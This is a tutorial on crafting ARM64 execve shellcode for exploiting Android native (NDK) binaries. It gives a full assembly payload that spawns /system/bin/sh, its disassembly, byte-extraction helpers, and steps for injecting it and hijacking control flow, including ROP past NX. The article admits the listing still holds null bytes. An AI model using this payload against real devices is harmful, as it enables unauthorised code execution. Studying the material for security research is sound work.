
Mastering ARM64 Shellcode Development for Android NDK Exploits


Introduction: Navigating the ARM64 Landscape in Android NDK Exploits

The Android ecosystem, largely powered by ARM-based processors, presents a unique and challenging environment for exploit developers. With the transition to 64-bit architectures, understanding ARM64 (AArch64) assembly becomes paramount for anyone looking to develop custom shellcode, especially within the context of Android Native Development Kit (NDK) binaries. This article delves into the intricacies of ARM64 shellcode development, focusing on practical techniques for crafting position-independent and null-byte-free payloads for NDK exploits.

Android NDK applications often interact directly with the underlying operating system and hardware, frequently utilizing native C/C++ code. Vulnerabilities within these native components, such as buffer overflows or format string bugs, can be exploited to inject and execute arbitrary ARM64 shellcode. Mastering this domain requires a deep understanding of ARM64 instruction sets, calling conventions, and the Android system call interface.

ARM64 Fundamentals for Shellcode Development

Before diving into shellcode, a solid grasp of ARM64 architecture is essential. Key components include:

  • Registers: ARM64 has 31 general-purpose 64-bit registers (x0-x30); w0-w30 name their lower 32 bits. x0-x7 carry function arguments, and x0 carries the return value. On Linux, x8 holds the syscall number. x29 is the Frame Pointer (FP) and x30 is the Link Register (LR). The Stack Pointer (SP) and the zero register (XZR) sit outside the general-purpose set and share register number 31 in instruction encodings.
  • Calling Convention (AAPCS64): The AArch64 Procedure Call Standard dictates how arguments are passed (x0-x7), how return values are handled (x0), and which registers must be preserved across function calls. For shellcode, we primarily care about setting up arguments for system calls.
  • Instruction Set: Common instructions include data movement (MOV, LDR, STR), arithmetic/logic (ADD, SUB, AND, ORR), branching (B, BL, BR), and system calls (SVC).
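Every AArch64 instruction is a fixed 32-bit word stored little-endian, which matters later when counting bytes. As a minimal sketch, the Python helpers below encode two of the instructions listed above by hand. The function names are illustrative, not part of any library, and only the 64-bit MOVZ form and SVC are covered.

```python
import struct

def encode_movz(rd: int, imm16: int, shift: int = 0) -> int:
    """Encode the 64-bit form `movz x<rd>, #imm16, lsl #shift` as a 32-bit word."""
    if not 0 <= rd <= 30:
        raise ValueError("rd must be a general-purpose register number 0..30")
    if not 0 <= imm16 <= 0xFFFF:
        raise ValueError("imm16 must fit in 16 bits")
    if shift not in (0, 16, 32, 48):
        raise ValueError("shift must be 0, 16, 32 or 48")
    return 0xD2800000 | ((shift // 16) << 21) | (imm16 << 5) | rd

def encode_svc(imm16: int = 0) -> int:
    """Encode `svc #imm16` as a 32-bit word."""
    if not 0 <= imm16 <= 0xFFFF:
        raise ValueError("imm16 must fit in 16 bits")
    return 0xD4000001 | (imm16 << 5)

def to_memory_bytes(word: int) -> bytes:
    """Return the four bytes of an instruction word as they sit in memory."""
    return struct.pack("<I", word)

if __name__ == "__main__":
    for text, word in (("mov x8, #221", encode_movz(8, 221)),
                       ("svc #0", encode_svc(0))):
        print(f"{text:14s} word={word:08x} bytes={to_memory_bytes(word).hex(' ')}")
```

The assembler accepts `mov x8, #221` as an alias for this MOVZ form, so the word produced here should match what a disassembler shows for that line.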

Position-Independent Code (PIC)

Shellcode is almost always position-independent, meaning it must execute correctly regardless of where it’s loaded in memory. This is crucial because the exact injection address of shellcode can vary. Techniques for PIC include:

  • Relative Addressing: Using ADR (form a PC-relative address, reaching ±1 MB) and ADRP (form the PC-relative address of a 4 KB page, reaching ±4 GB) to compute addresses from the current Program Counter (PC) instead of hard-coding them.
  • Stack-Based Strings: Pushing strings onto the stack and referencing them using the Stack Pointer (SP). This is often preferred for null-byte sensitive contexts.
  • Self-Modifying Code: Less common and often discouraged due to security and performance implications, but historically used.
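The difference between the two relative-addressing instructions is easy to miss, so here is a small Python model of the address arithmetic, offered as a sketch rather than an emulator. The addresses are made up for illustration. ADR adds a byte offset to the PC, while ADRP first clears the low 12 bits of the PC and then adds a whole number of pages, leaving the in-page offset to a following ADD.

```python
PAGE_SIZE = 0x1000  # ADRP works on 4 KB pages

def adr_target(pc: int, byte_offset: int) -> int:
    """Address computed by `adr`: PC plus a signed byte offset."""
    return pc + byte_offset

def adrp_add_target(pc: int, page_delta: int, lo12: int) -> int:
    """Address computed by `adrp` followed by `add ..., #lo12`."""
    page_base = pc & ~(PAGE_SIZE - 1)
    return page_base + page_delta * PAGE_SIZE + lo12

if __name__ == "__main__":
    # Hypothetical layout at build time: code at 0x10000, string 0x40 bytes later.
    build_pc, build_str = 0x10000, 0x10040
    byte_offset = build_str - build_pc      # constant baked into adr
    page_delta, lo12 = 0, build_str & 0xFFF  # constants baked into adrp + add

    # The same blob copied to an address with a different in-page offset.
    run_pc = 0x7F0000123458
    expected = run_pc + 0x40
    print(hex(adr_target(run_pc, byte_offset)), hex(expected))
    print(hex(adrp_add_target(run_pc, page_delta, lo12)), hex(expected))
```

In this model the ADR result follows the blob wherever it lands, while the ADRP plus ADD pair is only right when the blob keeps its original offset within a page. That is one reason injected payloads usually reach nearby data with ADR.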

Null Byte Avoidance

Many exploit vectors, especially buffer overflows, terminate string copying functions upon encountering a null byte (0x00). Therefore, shellcode must be crafted to avoid null bytes in its instruction stream and embedded data. This often means:

  • Avoiding instructions whose encodings contain null bytes (e.g., mov x0, #0 assembles to the word 0xd2800000, which is stored in memory as 00 00 80 d2).
  • Using multiple smaller immediate loads (MOV, MOVK) or bitwise operations to construct values.
  • Carefully constructing strings on the stack without null terminators mid-string (only at the end if needed by a function).
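Checking for null bytes is mechanical, so it is worth scripting. The sketch below assumes you already have the instruction words from a disassembly listing; the function name is illustrative. It lays the words out as they appear in memory and reports every offset that holds 0x00.

```python
import struct

def null_byte_offsets(words):
    """Return the byte offsets that hold 0x00 once the 32-bit words are stored little-endian."""
    blob = b"".join(struct.pack("<I", w) for w in words)
    return [offset for offset, value in enumerate(blob) if value == 0]

if __name__ == "__main__":
    candidates = {
        "mov x0, #0": 0xD2800000,
        "mov x8, #221": 0xD2801BA8,
        "svc #0": 0xD4000001,
    }
    for text, word in candidates.items():
        offsets = null_byte_offsets([word])
        verdict = "clean" if not offsets else f"null bytes at offsets {offsets}"
        print(f"{text:14s} {word:08x} {verdict}")
```

Running a check like this over the whole payload after every change catches regressions early, since a single replaced immediate can reintroduce a zero byte.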

Crafting a Basic ARM64 execve Shellcode

Let’s develop a common shellcode payload: executing /system/bin/sh. The execve system call requires three arguments: the path to the executable, an array of arguments (argv), and an array of environment variables (envp).

  • Syscall Number: On ARM64 Linux (and thus Android), the execve syscall number is 221. This value is loaded into register x8.
  • Path: x0 will point to the string "/system/bin/sh".
  • argv: x1 will point to an array of pointers: {"/system/bin/sh", NULL}.
  • envp: x2 will be NULL, which Linux treats as an empty environment.
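To make the memory layout behind these arguments concrete, the following Python sketch packs the path string into little-endian 64-bit words (the unit a single STR writes) and builds the 16-byte argv array. The path address used in the demo is a made-up value, and the helper names are illustrative.

```python
import struct

PATH = b"/system/bin/sh\x00"  # 14 characters plus the NUL terminator = 15 bytes

def path_as_words(path: bytes = PATH):
    """Split a NUL-terminated path into little-endian 64-bit words, zero-padded to a multiple of 8."""
    padded_len = -(-len(path) // 8) * 8
    padded = path.ljust(padded_len, b"\x00")
    return [int.from_bytes(padded[i:i + 8], "little") for i in range(0, padded_len, 8)]

def build_argv_block(path_addr: int) -> bytes:
    """Lay out argv = {path_addr, NULL} as two 8-byte little-endian pointers."""
    return struct.pack("<QQ", path_addr, 0)

if __name__ == "__main__":
    for index, word in enumerate(path_as_words()):
        print(f"path word {index}: 0x{word:016x}")
    # 0x7FFFF000 is a hypothetical address where the path string lives.
    print("argv block:", build_argv_block(0x7FFFF000).hex(" "))
```

Note that the second path word carries two zero bytes (the terminator and one byte of padding), which is exactly the kind of embedded data the null-byte rules above are concerned with.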

Our strategy keeps the path string in a labeled data block that the code addresses relative to the PC, and builds the argv pointer array on the stack.

Step 1: Constructing the Shellcode

Here's the ARM64 assembly for a simple execve("/system/bin/sh", ["/system/bin/sh"], NULL) shellcode:

// execve("/system/bin/sh", {"/system/bin/sh", NULL}, NULL)
// Assumes SP is 16-byte aligned on entry.
// Despite the label name, this listing is not yet null-free:
// adrp, mov x0, #0 and svc #0 all encode with zero bytes.

.data
.balign 16
shell_path:
    .asciz "/system/bin/sh"             // 14 characters plus the NUL terminator

.text
.balign 4
.globl _start_shellcode_execve_arm64_pic_nullfree   // exported only so the code can be tested standalone
_start_shellcode_execve_arm64_pic_nullfree:
    // 1. Set up x0 (path). GNU as syntax; @PAGE/@PAGEOFF is the Mach-O spelling.
    adrp x0, shell_path                 // 4 KB page containing shell_path
    add  x0, x0, :lo12:shell_path       // plus the offset within that page

    // 2. Set up x1 (argv) on the stack
    sub  sp, sp, #16                    // room for two 8-byte slots (path_ptr, NULL)
    str  xzr, [sp, #8]                  // argv[1] = NULL
    str  x0, [sp]                       // argv[0] = path_ptr
    mov  x1, sp                         // x1 = &argv[0]

    // 3. Set up x2 (envp)
    mov  x2, xzr                        // x2 = NULL

    // 4. Set syscall number into x8
    mov  x8, #221                       // SYS_execve

    // 5. Execute system call
    svc  #0

    // Reached only if execve fails: exit(0)
    mov  x8, #93                        // SYS_exit
    mov  x0, #0                         // exit code 0
    svc  #0

Explanation of the Shellcode:

  1. .data and .balign 16 shell_path: .asciz "/system/bin/sh": Defines the string "/system/bin/sh" and ensures it’s 16-byte aligned. This is data, not part of the executable shellcode stream, but referenced by it.
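  2. adrp x0, shell_path and add x0, x0, :lo12:shell_path (GNU assembler syntax; Apple's assembler spells the same pair with @PAGE and @PAGEOFF): These two instructions compute the address of shell_path in x0 relative to the PC. ADRP produces the base address of the 4KB page containing shell_path, and ADD adds the offset within that page. The pair stays correct only while the code keeps the same offset within its 4KB page that it had at link time; a blob copied to an arbitrary address should reach a nearby label with adr instead.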
  3. sub sp, sp, #16: Decrements the stack pointer to allocate 16 bytes (two 64-bit words) for the argv array.
  4. str xzr, [sp, #8]: Stores the zero register (xzr) at sp+8. This effectively places a NULL pointer, which serves as the terminator for our argv array.
  5. str x0, [sp, #0]: Stores the address of "/system/bin/sh" (currently in x0) at sp+0. This is the first element of our argv array.
  6. mov x1, sp: Sets x1 to point to the beginning of our argv array on the stack.
  7. mov x2, xzr: Sets x2 to NULL for the envp argument.
  8. mov x8, #221: Loads the execve syscall number (221) into x8.
  9. svc #0: Executes the system call.
  10. mov x8, #93 and mov x0, #0 and svc #0: If execve fails, the shellcode will fall through to an exit(0) syscall to terminate the process cleanly.

Step 2: Assembling and Extracting

To turn this assembly into raw shellcode, you’ll use an ARM64 assembler (like aarch64-linux-gnu-as from a GNU binutils cross toolchain) and an object dump utility.

# Save the assembly code as shellcode.s
aarch64-linux-gnu-as -o shellcode.o shellcode.s
aarch64-linux-gnu-objdump -d shellcode.o | grep -A20 '<_start_shellcode_execve_arm64_pic_nullfree>:'
# This will show the disassembled bytes. Extract the raw bytes.

Example objdump output might look like:

0000000000000000 <_start_shellcode_execve_arm64_pic_nullfree>:
   0:   90000000    adrp    x0, 0 <_start_shellcode_execve_arm64_pic_nullfree>
   4:   91000000    add     x0, x0, #0x0
   8:   d10043ff    sub     sp, sp, #0x10
   c:   f90007ff    str     xzr, [sp, #8]
  10:   f90003e0    str     x0, [sp]
  14:   910003e1    mov     x1, sp
  18:   aa1f03e2    mov     x2, xzr
  1c:   d2801ba8    mov     x8, #0xdd                   // #221
  20:   d4000001    svc     #0x0
  24:   d2800ba8    mov     x8, #0x5d                   // #93
  28:   d2800000    mov     x0, #0x0                    // #0
  2c:   d4000001    svc     #0x0

objdump prints each instruction as a 32-bit word, but AArch64 stores instructions little-endian, so the word 90000000 becomes the bytes 00 00 00 90 in memory. Reverse each word's bytes as you extract them (e.g., 0000009000000091...) and convert the result to a C-style byte array for your exploit. In an unlinked object file the adrp and add immediates are zero placeholders; the linker fills in the real relative address, which depends on where the string is in relation to the code. For actual shellcode, the string cannot stay in a separate .data section: it would typically be placed directly after the final `svc #0` if space allows, or immediately after a `b` instruction that jumps over it.
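The word-to-byte conversion is easy to get wrong by hand, so a short script helps. The sketch below assumes the instruction words have been copied out of the objdump listing; the function name and the default array name are illustrative. It emits a C array initializer with the bytes in memory order.

```python
import struct

def words_to_c_array(words, name: str = "shellcode") -> str:
    """Render 32-bit instruction words as a C byte array in little-endian memory order."""
    blob = b"".join(struct.pack("<I", w) for w in words)
    body = ", ".join(f"0x{b:02x}" for b in blob)
    return f"unsigned char {name}[] = {{ {body} }};"

if __name__ == "__main__":
    # First two words of the listing: adrp x0, ... and add x0, x0, ...
    print(words_to_c_array([0x90000000, 0x91000000]))
```

A brace initializer is used here rather than a string literal so that the array length equals the payload length, with no implicit terminating byte added by the compiler.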

Integration into NDK Exploits

Once you have the raw shellcode bytes, integrating them into an Android NDK exploit typically involves:

  1. Memory Allocation: Finding or allocating executable memory within the target process’s address space. This might involve heap spraying, abusing existing executable regions, or using `mmap`.
  2. Injection: Copying the shellcode bytes into the allocated executable memory.
  3. Execution: Redirecting program execution flow (e.g., by overwriting a return address on the stack or a function pointer in a global offset table) to the start of your injected shellcode.

Challenges often arise from Address Space Layout Randomization (ASLR), Non-Executable (NX) bits, and Seccomp filters, which mitigate these types of attacks. Bypassing these requires additional techniques like information leaks (to defeat ASLR) and Return-Oriented Programming (ROP) to chain gadgets that disable NX or call `mprotect` before executing shellcode.

Conclusion

Mastering ARM64 shellcode development for Android NDK exploits is a critical skill for advanced penetration testers and security researchers. It demands a thorough understanding of the ARM64 architecture, calling conventions, and the nuances of creating position-independent, null-byte-free payloads. While the process can be intricate, the ability to craft custom shellcode provides unparalleled control over exploited systems, opening doors for further post-exploitation activities and deeper security analysis.
